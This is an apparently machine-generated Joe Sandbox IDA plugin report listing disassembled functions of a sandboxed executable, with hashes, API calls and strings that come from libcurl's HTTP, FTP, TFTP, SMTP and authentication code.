String ID: CURLFORM_CONTENTTYPE, "%s",$ CURLFORM_COPYCONTENTS, "%s",$ CURLFORM_COPYNAME, "%s",$ CURLFORM_END);$ CURLFORM_FILE, "%s",$ CURLFORM_FILECONTENT, "%s",$ CURLFORM_FILENAME, "%s",$CURLOPT_HTTPPOST$curl_easy_setopt(hnd, %s, post%d);$curl_formadd(&post%d, &postend,$curl_formfree(post%d);$post%d = NULL;$postend = NULL;$struct curl_httppost *post%d;$struct curl_httppost *postend;
API String ID: 2190258309-3873805648
Opcode ID: 64ffcf965254c230b91c2cb67932900c583e1025ddf45ec2f1819ea4db04fc6a
Instruction ID: 59ed2ffffb8f20c88c4801e44b54400edd10bac1710ac956fd092527c8721ead
Opcode Fuzzy Hash: 64ffcf965254c230b91c2cb67932900c583e1025ddf45ec2f1819ea4db04fc6a
Instruction Fuzzy Hash: BF617211A0864741FB51BB26A814178E790AF4DBD4FC40036D83D8B2D9EE2CE54EA3EC

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D316B8 Relevance: 28.3, APIs: 7, Strings: 9, Instructions: 342COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D318B8
__swprintf_l.LIBCMT ref: 00007FF7F8D3190D
__swprintf_l.LIBCMT ref: 00007FF7F8D319CA
__swprintf_l.LIBCMT ref: 00007FF7F8D31A7B

Strings

timeout, xrefs: 00007FF7F8D31A9C
octet, xrefs: 00007FF7F8D316F1
%I64d, xrefs: 00007FF7F8D318FD
TFTP file name too long, xrefs: 00007FF7F8D3187B
%s%c%s%c, xrefs: 00007FF7F8D3189B
tsize, xrefs: 00007FF7F8D3193B
blksize, xrefs: 00007FF7F8D319F1
tftp_send_first: internal error, xrefs: 00007FF7F8D31729
netascii, xrefs: 00007FF7F8D316E4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l
String ID: %I64d$%s%c%s%c$TFTP file name too long$blksize$netascii$octet$tftp_send_first: internal error$timeout$tsize
API String ID: 1488884202-1678188727
Opcode ID: 3c2b5f10e5b307837c352ffca8a5f65d6e41c9a2c57687f587b42ed72d151fc5
Instruction ID: f1b63b33cfb81c0c27b9865d6447ff0d0402bed449c19999d0b8a889257bfe30
Opcode Fuzzy Hash: 3c2b5f10e5b307837c352ffca8a5f65d6e41c9a2c57687f587b42ed72d151fc5
Instruction Fuzzy Hash: 3CE1E462B08A8795EF15EB25D4501B8E764FF4DB84F844132DA6E037C5DE3CE01AE3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D29FC8 Relevance: 26.6, APIs: 4, Strings: 11, Instructions: 344COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2A15F
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2A2E3
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2A541

Strings

Ignoring duplicate digest auth header., xrefs: 00007FF7F8D2A3FF
NTLM, xrefs: 00007FF7F8D2A227, 00007FF7F8D2A261, 00007FF7F8D2A299
Digest, xrefs: 00007FF7F8D2A3E1, 00007FF7F8D2A445
HTTP, xrefs: 00007FF7F8D2A0B7
NTLM handshake failure (internal error), xrefs: 00007FF7F8D2A3C6
NTLM auth restarted, xrefs: 00007FF7F8D2A331
Negotiate, xrefs: 00007FF7F8D2A03C, 00007FF7F8D2A076
WDigest, xrefs: 00007FF7F8D2A42F
NTLM handshake rejected, xrefs: 00007FF7F8D2A385
Basic, xrefs: 00007FF7F8D2A4D3
Authentication problem. Ignoring this., xrefs: 00007FF7F8D2A4A5, 00007FF7F8D2A4FC

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isspace
String ID: Authentication problem. Ignoring this.$Basic$Digest$HTTP$Ignoring duplicate digest auth header.$NTLM$NTLM auth restarted$NTLM handshake failure (internal error)$NTLM handshake rejected$Negotiate$WDigest
API String ID: 3785662208-2823367978
Opcode ID: a2776838ef191d488698e1113e167f6e7cf0d4bacb73377f98718ee2b4dd774a
Instruction ID: add97fc508e0179ccf739c7fd173712e785b413ee43950fa601d11dd8ce0c866
Opcode Fuzzy Hash: a2776838ef191d488698e1113e167f6e7cf0d4bacb73377f98718ee2b4dd774a
Instruction Fuzzy Hash: D7F1C461A0C68295FB14EF21E8453B9E7A0FF49B90F844132CE6D472D5DF2CE409E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D421BC Relevance: 26.6, APIs: 3, Strings: 12, Instructions: 323stringCOMMON

Download Yara Rule

APIs

strpbrk.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D4234C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D426E0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D42707

Strings

GSSAPI, xrefs: 00007FF7F8D4238A
XOAUTH2, xrefs: 00007FF7F8D425C0
NTLM, xrefs: 00007FF7F8D424D7
DIGEST-MD5, xrefs: 00007FF7F8D42448
LOGIN, xrefs: 00007FF7F8D425F5
OAUTHBEARER, xrefs: 00007FF7F8D42551
EXTERNAL, xrefs: 00007FF7F8D422B4
Kerberos, xrefs: 00007FF7F8D4231D
WDigest, xrefs: 00007FF7F8D42438
\/@, xrefs: 00007FF7F8D42342
PLAIN, xrefs: 00007FF7F8D42643
CRAM-MD5, xrefs: 00007FF7F8D424A4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$strpbrk
String ID: CRAM-MD5$DIGEST-MD5$EXTERNAL$GSSAPI$Kerberos$LOGIN$NTLM$OAUTHBEARER$PLAIN$WDigest$XOAUTH2$\/@
API String ID: 1876339070-1955273572
Opcode ID: 627142d0ac5b4b03070fa733e8a7e04b4f36d76eab5a5aaa639ad483ae21a84e
Instruction ID: 3206c9aa169f56c5273ee6f09fb7cc5e7c691489140b64ef206684818218983b
Opcode Fuzzy Hash: 627142d0ac5b4b03070fa733e8a7e04b4f36d76eab5a5aaa639ad483ae21a84e
Instruction Fuzzy Hash: 7AF18F72A0DA869AEB14DB60E4543A9F7A4FF08758F880172CE6D037D4CF39E458D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D32ADC Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 234fileCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D32B9F
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D32BC0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D32BE0
fgets.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D32BF8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D32CB1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D32D0F
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D32E23

Strings

HOME, xrefs: 00007FF7F8D32B50
%s%s%s, xrefs: 00007FF7F8D32B7D
login, xrefs: 00007FF7F8D32D41
, xrefs: 00007FF7F8D32C0C, 00007FF7F8D32DF1
_netrc, xrefs: 00007FF7F8D32B6C
default, xrefs: 00007FF7F8D32DD4
password, xrefs: 00007FF7F8D32D5E
machine, xrefs: 00007FF7F8D32D78, 00007FF7F8D32DB9

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$fclosefgetsfopen
String ID: $%s%s%s$HOME$_netrc$default$login$machine$password
API String ID: 1690894011-828792305
Opcode ID: f345a6cb1b4f44c348019cb4d8307a7200c9c064f7db40b26f7390055e19fab3
Instruction ID: 37b5cfb4239e4a0ff6ae69051dac919dabde6713f414506a810671ab9b322d50
Opcode Fuzzy Hash: f345a6cb1b4f44c348019cb4d8307a7200c9c064f7db40b26f7390055e19fab3
Instruction Fuzzy Hash: EBA18E11E0DA4285FB21BB22E810379E290AF9CB95F880131DD6E477D5DE3CE549F3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D39780 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 170networkCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D39874
__swprintf_l.LIBCMT ref: 00007FF7F8D398F8
__swprintf_l.LIBCMT ref: 00007FF7F8D3992B
send.WS2_32 ref: 00007FF7F8D39947
WSAGetLastError.WS2_32 ref: 00007FF7F8D39951
__swprintf_l.LIBCMT ref: 00007FF7F8D399FF
send.WS2_32 ref: 00007FF7F8D39A16
WSAGetLastError.WS2_32 ref: 00007FF7F8D39A20

Strings

#, xrefs: 00007FF7F8D399A0
%c%s%c%s, xrefs: 00007FF7F8D398EE
%c%c%c%c, xrefs: 00007FF7F8D3984E
%127[^,],%127s, xrefs: 00007FF7F8D398B6
%c%c, xrefs: 00007FF7F8D3991E
Sending data failed (%d), xrefs: 00007FF7F8D39957, 00007FF7F8D39A26
%c%c%c%c%s%c%c, xrefs: 00007FF7F8D399EF

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l$ErrorLastsend
String ID: #$%127[^,],%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s%c%s$Sending data failed (%d)
API String ID: 716699274-931584821
Opcode ID: accfacfbed0691bd31916b5ea100c71bd05bde07445c8d7c96d950cd383fc81f
Instruction ID: bf77e1e15f3fec876895752a943cd01338b3873bef217bb88cc79a93b61f1895
Opcode Fuzzy Hash: accfacfbed0691bd31916b5ea100c71bd05bde07445c8d7c96d950cd383fc81f
Instruction Fuzzy Hash: 5A81C43261868695E710AF21E4447EAF7A0FF49798F840232EA6D07BD5CF3CD149E7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2D64C Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 351COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D2D6EE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2D7C5

Strings

Set-Cookie:, xrefs: 00007FF7F8D2D652
Content-Length:, xrefs: 00007FF7F8D2D11C
Location:, xrefs: 00007FF7F8D2D7F3
HTTP 1.0, assume close after body, xrefs: 00007FF7F8D2D04C
Last-Modified:, xrefs: 00007FF7F8D2D6C7
HTTP/%1d.%1d%c%3d, xrefs: 00007FF7F8D2CE92
WWW-Authenticate:, xrefs: 00007FF7F8D2D740
HTTP/2 %d, xrefs: 00007FF7F8D2CEB5
Proxy-authenticate:, xrefs: 00007FF7F8D2D767
Lying server, not serving HTTP/2, xrefs: 00007FF7F8D2CF0D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _time64free
String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$Content-Length:$HTTP 1.0, assume close after body$Last-Modified:$Location:$Lying server, not serving HTTP/2$Proxy-authenticate:$Set-Cookie:$WWW-Authenticate:
API String ID: 4146837529-1502833421
Opcode ID: f770d3bb0f5fe69c0237501cabe2252e00aa6915996c321f3f1ce669ecdd3814
Instruction ID: 58ba9cb429a0f0287d6703a9a7fc3400cd2223b5463684a3ad7a9df40da5f6e3
Opcode Fuzzy Hash: f770d3bb0f5fe69c0237501cabe2252e00aa6915996c321f3f1ce669ecdd3814
Instruction Fuzzy Hash: F1F19531A0878A86EB64EB21D4406B9E7A0FF09790F844135CB7D836D1DF3CE459E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2CE5A Relevance: 24.8, APIs: 3, Strings: 11, Instructions: 330stringCOMMON

Download Yara Rule

APIs

strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D2D13F

Part of subcall function 00007FF7F8D03018: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D03055

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2D1F4

Strings

Content-Length:, xrefs: 00007FF7F8D2D11C
Content-Type:, xrefs: 00007FF7F8D2D1A7
RTSP/%d.%d %3d, xrefs: 00007FF7F8D2CF94
Negative content-length: %I64d, closing after transfer, xrefs: 00007FF7F8D2D18C
HTTP 1.0, assume close after body, xrefs: 00007FF7F8D2D04C
Maximum file size exceeded, xrefs: 00007FF7F8D2DC51
Unsupported HTTP version in response, xrefs: 00007FF7F8D2DC2B
HTTP %3d, xrefs: 00007FF7F8D2CF30
HTTP/%1d.%1d%c%3d, xrefs: 00007FF7F8D2CE92
HTTP/2 %d, xrefs: 00007FF7F8D2CEB5
Lying server, not serving HTTP/2, xrefs: 00007FF7F8D2CF0D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __stdio_common_vsscanffreestrtoll
String ID: HTTP %3d$ HTTP/%1d.%1d%c%3d$ HTTP/2 %d$ RTSP/%d.%d %3d$Content-Length:$Content-Type:$HTTP 1.0, assume close after body$Lying server, not serving HTTP/2$Maximum file size exceeded$Negative content-length: %I64d, closing after transfer$Unsupported HTTP version in response
API String ID: 393391272-2638250612
Opcode ID: 0bc6d93b9c256044bd23605a67b9d2c13bf6b6d666b92c6c2dcfae6e40dc1a53
Instruction ID: 85cb3255e49f2f3c0ae763a6339a438dab600d7d8799b484e03569f3407d3422
Opcode Fuzzy Hash: 0bc6d93b9c256044bd23605a67b9d2c13bf6b6d666b92c6c2dcfae6e40dc1a53
Instruction Fuzzy Hash: 78F1A432A0868A86EB54AF24D5406B9F7A0FF09780F844131CB6D836D5DF3CE459E7B9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2EEB4 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 124COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2EF83
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2EFCA
_cwprintf_s_l.LIBCMT ref: 00007FF7F8D2EFFC
_cwprintf_s_l.LIBCMT ref: 00007FF7F8D2F00D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2F04C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2F061
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2F076

Strings

MAIL FROM:%s AUTH=%s, xrefs: 00007FF7F8D2F01C
MAIL FROM:%s SIZE=%s, xrefs: 00007FF7F8D2F006
<%s>, xrefs: 00007FF7F8D2EF0A
MAIL FROM:%s AUTH=%s SIZE=%s, xrefs: 00007FF7F8D2F025
%I64d, xrefs: 00007FF7F8D2EFA3
MAIL FROM:%s, xrefs: 00007FF7F8D2EFF5

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$_cwprintf_s_l
String ID: %I64d$<%s>$MAIL FROM:%s$MAIL FROM:%s AUTH=%s$MAIL FROM:%s AUTH=%s SIZE=%s$MAIL FROM:%s SIZE=%s
API String ID: 2020354070-658513215
Opcode ID: fb0ea872ed6b106fcfbfe2da83298d7f441b5d03f24d44e456eb95fd13d1b78c
Instruction ID: ecae7c112cf73b06682d7c063a381211960309dc18c006e92d207eda1c7c8acc
Opcode Fuzzy Hash: fb0ea872ed6b106fcfbfe2da83298d7f441b5d03f24d44e456eb95fd13d1b78c
Instruction Fuzzy Hash: 33513B21A0DA9691FB64FB16F950678E760BF5CB80FC84035D92E462D1DE3CE44DA3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D4079C Relevance: 24.3, APIs: 13, Strings: 3, Instructions: 286COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D4087B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D408C3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D408E0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40924
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D4095B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40970
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40985
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D409FD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40A12
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40A27
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40B2C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40B41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,?), ref: 00007FF7F8D40B56

Strings

%s/%s, xrefs: 00007FF7F8D408F0
WDigest, xrefs: 00007FF7F8D4085B, 00007FF7F8D409B7
DIGEST-MD5 handshake failure (empty challenge message), xrefs: 00007FF7F8D40BE0

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc
String ID: %s/%s$DIGEST-MD5 handshake failure (empty challenge message)$WDigest
API String ID: 2190258309-3361356676
Opcode ID: e1415b4fae2aebf1a358e3320af16f1c61da821f3030c15ecb8a85b33fc05d46
Instruction ID: 55b128973eece69638844cb947f08456a92dd3f8c62be1d4da14c481ddf8ca77
Opcode Fuzzy Hash: e1415b4fae2aebf1a358e3320af16f1c61da821f3030c15ecb8a85b33fc05d46
Instruction Fuzzy Hash: 24C13B25A0CB4686EB50AF66F8501A9E7A4FF4CB94F880032DE5E577A4DF3CD408D798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D462B4 Relevance: 24.2, APIs: 1, Strings: 15, Instructions: 167COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D463BC

Strings

dh(p), xrefs: 00007FF7F8D464C9
rsa(e), xrefs: 00007FF7F8D463EA
%lu, xrefs: 00007FF7F8D46383
dsa(p), xrefs: 00007FF7F8D46431
dsa(q), xrefs: 00007FF7F8D4645C
dsa, xrefs: 00007FF7F8D463F6
RSA Public Key (%lu bits), xrefs: 00007FF7F8D4636C
dh(g), xrefs: 00007FF7F8D464F2
rsaEncryption, xrefs: 00007FF7F8D462F3
dsa(g), xrefs: 00007FF7F8D46484
dsa(pub_key), xrefs: 00007FF7F8D46490
dhpublicnumber, xrefs: 00007FF7F8D46499
dh(pub_key), xrefs: 00007FF7F8D464FE
RSA Public Key, xrefs: 00007FF7F8D4639A
rsa(n), xrefs: 00007FF7F8D463C5

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID: RSA Public Key (%lu bits)$%lu$RSA Public Key$dh(g)$dh(p)$dh(pub_key)$dhpublicnumber$dsa$dsa(g)$dsa(p)$dsa(pub_key)$dsa(q)$rsa(e)$rsa(n)$rsaEncryption
API String ID: 1294909896-1220118048
Opcode ID: dcf43be8042818968ab8e6fdab6af4e1b97ddff25a6de256c822809f1ac30582
Instruction ID: 4b91be060b728393328879838f5ab2f4998c6482cc02a1f0f87f6627b7ad13ed
Opcode Fuzzy Hash: dcf43be8042818968ab8e6fdab6af4e1b97ddff25a6de256c822809f1ac30582
Instruction Fuzzy Hash: AD712F61A0CA5690FB14AB61E9401FCE360AF08BC4BC84077DD2E576C5DF38E549E3E8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D373C0 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 289COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D37465
_cwprintf_s_l.LIBCMT ref: 00007FF7F8D375FD

Strings

Received only partial file: %I64d bytes, xrefs: 00007FF7F8D377FB
ABOR, xrefs: 00007FF7F8D375EC
partial download completed, closing connection, xrefs: 00007FF7F8D3771E
Remembering we are in dir "%s", xrefs: 00007FF7F8D37571
Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 00007FF7F8D377C8
server did not report OK, got %d, xrefs: 00007FF7F8D37762
Failure sending ABOR command: %s, xrefs: 00007FF7F8D37612
No data was received!, xrefs: 00007FF7F8D37825
control connection looks dead, xrefs: 00007FF7F8D376DA

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _cwprintf_s_lfree
String ID: ABOR$Failure sending ABOR command: %s$No data was received!$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
API String ID: 52267941-2312071747
Opcode ID: af486cb4fd75f6543c0f10e2d137d75b8a9d679ca92db0817cda33cde9a9a59c
Instruction ID: 27cefa5266e6d3e950d295c724e981c6d3bdff758612deefa4c0fcbaa7ce903f
Opcode Fuzzy Hash: af486cb4fd75f6543c0f10e2d137d75b8a9d679ca92db0817cda33cde9a9a59c
Instruction Fuzzy Hash: 54D18451A0CFC245FB65EB25E4103B9EA90AF49764F884235CA7E076D1CE6CE54CF3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2D3F8 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 267COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2D401

Strings

chunked, xrefs: 00007FF7F8D2D41C
Content-Length:, xrefs: 00007FF7F8D2D11C
identity, xrefs: 00007FF7F8D2D455
x-gzip, xrefs: 00007FF7F8D2D4BF
,, xrefs: 00007FF7F8D2D40B
deflate, xrefs: 00007FF7F8D2D479
HTTP 1.0, assume close after body, xrefs: 00007FF7F8D2D04C
gzip, xrefs: 00007FF7F8D2D4A0
HTTP/%1d.%1d%c%3d, xrefs: 00007FF7F8D2CE92
HTTP/2 %d, xrefs: 00007FF7F8D2CEB5
